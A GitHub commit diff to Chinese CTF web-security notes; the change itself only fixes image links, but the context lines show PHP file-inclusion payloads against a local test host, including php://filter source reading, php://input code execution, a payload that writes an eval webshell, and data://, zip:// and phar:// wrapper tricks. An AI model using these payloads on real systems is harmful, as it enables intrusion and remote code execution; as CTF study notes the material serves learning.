Skip to content

Commit b3fc6d1

Browse files
committed
8.13
1 parent f203118 commit b3fc6d1

File tree

13 files changed

+15
-15
lines changed

13 files changed

+15
-15
lines changed

src/CyberSecurity/CTF/1-CTF_WEB.md

Lines changed: 15 additions & 15 deletions
Original file line numberDiff line numberDiff line change
@@ -333,23 +333,23 @@ md5 碰撞面对一些绕过非常有用,例如通过参数上传一句话木
333333
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt
334334
```
335335
336-
![图片描述](img/1-CTF_WEB/bVbrQAZ)
336+
![](img/1-CTF_WEB/bVbrQAZ.png)
337337
338338
2. `[文件的相对路径和文件名]`
339339
340340
```http
341341
http://127.0.0.1/include.php?file=./phpinfo.txt
342342
```
343343
344-
![图片描述](img/1-CTF_WEB/bVbrQA1)
344+
![](img/1-CTF_WEB/bVbrQA1.png)
345345
346346
3. `[http://网络路径和文件名]`
347347
348348
```http
349349
http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt
350350
```
351351
352-
![图片描述](img/1-CTF_WEB/bVbrQBb)
352+
![](img/1-CTF_WEB/bVbrQBb.png)
353353
354354
- **参考**:[http://php.net/manual/zh/wrappers.file.php](https://link.segmentfault.com/?enc=DuT6iHHjrv6yYwe%2FL%2BXwLw%3D%3D.khro9XPxRj3wwsu1ZqN%2FR%2Bc2T9GU1D2%2BPCinvjrKORB9TsauqGBqEgNvkasA34na)
355355
@@ -420,7 +420,7 @@ md5 碰撞面对一些绕过非常有用,例如通过参数上传一句话木
420420
http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php
421421
```
422422
423-
![图片描述](img/1-CTF_WEB/bVbrQBf)
423+
![](img/1-CTF_WEB/bVbrQBf.png)
424424
425425
2. `php://input + [POST DATA]`执行php代码
426426
@@ -430,7 +430,7 @@ md5 碰撞面对一些绕过非常有用,例如通过参数上传一句话木
430430
<?php phpinfo(); ?>
431431
```
432432
433-
![图片描述](img/1-CTF_WEB/bVbrQBh)
433+
![](img/1-CTF_WEB/bVbrQBh.png)
434434
435435
若有写入权限,写入一句话木马
436436
@@ -440,7 +440,7 @@ md5 碰撞面对一些绕过非常有用,例如通过参数上传一句话木
440440
<?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>
441441
```
442442
443-
![图片描述](img/1-CTF_WEB/bVbrQBi)
443+
![](img/1-CTF_WEB/bVbrQBi.png)
444444
445445
- **参考**:[https://php.net/manual/zh/wrappers.php.php](https://link.segmentfault.com/?enc=juZnqmg2HQMZii5vLbm1bQ%3D%3D.f4xV6RjgZWGtUZ%2FjtD%2BE4GPxKFoDqttbkcw61aLWdrXwAqdVpt4QM0sZ%2Bw48219A)
446446
@@ -463,7 +463,7 @@ md5 碰撞面对一些绕过非常有用,例如通过参数上传一句话木
463463
http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt
464464
```
465465
466-
![图片描述](img/1-CTF_WEB/bVbrQBj)
466+
![](img/1-CTF_WEB/bVbrQBj.png)
467467
468468
2. `compress.bzip2://file.bz2`
469469
@@ -473,7 +473,7 @@ md5 碰撞面对一些绕过非常有用,例如通过参数上传一句话木
473473
http://127.0.0.1/include.php?file=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz2
474474
```
475475
476-
![图片描述](img/1-CTF_WEB/bVbrQBt)
476+
![](img/1-CTF_WEB/bVbrQBt.png)
477477
478478
3. `compress.zlib://file.gz`
479479
@@ -483,7 +483,7 @@ md5 碰撞面对一些绕过非常有用,例如通过参数上传一句话木
483483
http://127.0.0.1/include.php?file=compress.zlib://E:\phpStudy\PHPTutorial\WWW\phpinfo.gz
484484
```
485485
486-
![图片描述](img/1-CTF_WEB/bVbrQBu)
486+
![](img/1-CTF_WEB/bVbrQBu.png)
487487
488488
- **参考**:[http://php.net/manual/zh/wrappers.compression.php](https://link.segmentfault.com/?enc=c7kLn2116lHYz%2Bxdh8uWLg%3D%3D.sj39fMX2XLCmDRe1yx3bXe0O%2Bl37DHiuTIrhp7TD4ecbPodccTGwi7qnB9m8IDmNVyGc5NV8nkQb6X9PUiRlow%3D%3D)
489489
@@ -511,15 +511,15 @@ md5 碰撞面对一些绕过非常有用,例如通过参数上传一句话木
511511
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
512512
```
513513
514-
![图片描述](img/1-CTF_WEB/bVbrQBB)
514+
![](img/1-CTF_WEB/bVbrQBB)
515515
516516
2. `data://text/plain;base64,`
517517
518518
```http
519519
http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
520520
```
521521
522-
![图片描述](img/1-CTF_WEB/bVbrQBD)
522+
![](img/1-CTF_WEB/bVbrQBD.png)
523523
524524
### `http:// & https://` 协议
525525
@@ -532,7 +532,7 @@ md5 碰撞面对一些绕过非常有用,例如通过参数上传一句话木
532532
533533
- **用法**:
534534
535-
```awk
535+
```http
536536
http://example.com
537537
http://example.com/file.php?var1=val1&var2=val2
538538
http://user:[email protected]
@@ -547,7 +547,7 @@ md5 碰撞面对一些绕过非常有用,例如通过参数上传一句话木
547547
http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt
548548
```
549549

550-
![图片描述](img/1-CTF_WEB/bVbrQBP)
550+
![](img/1-CTF_WEB/bVbrQBP.png)
551551

552552
### `phar://` 协议
553553

@@ -557,7 +557,7 @@ md5 碰撞面对一些绕过非常有用,例如通过参数上传一句话木
557557
http://127.0.0.1/include.php?file=phar://E:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt
558558
```
559559

560-
![图片描述](img/1-CTF_WEB/bVbrQBX)
560+
![](img/1-CTF_WEB/bVbrQBX.png)
561561

562562
另外在 Black Hat 2018 大会上,研究人员公布了一款针对PHP应用程序的全新攻击技术:**phar://协议对象注入技术**
563563

@@ -587,7 +587,7 @@ http://127.0.0.1/include.php?file=phar://E:/phpStudy/PHPTutorial/WWW/phpinfo.zip
587587

588588
![image-20240812173341997](img/1-CTF_WEB/image-20240812173341997.png)
589589

590-
这里过滤了空格,我使用`%09`(Tab)绕过
590+
这里过滤了空格,我使用`%09`(`Tab`)绕过
591591

592592
![image-20240812173552674](img/1-CTF_WEB/image-20240812173552674.png)
593593

File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.

0 commit comments

Comments
 (0)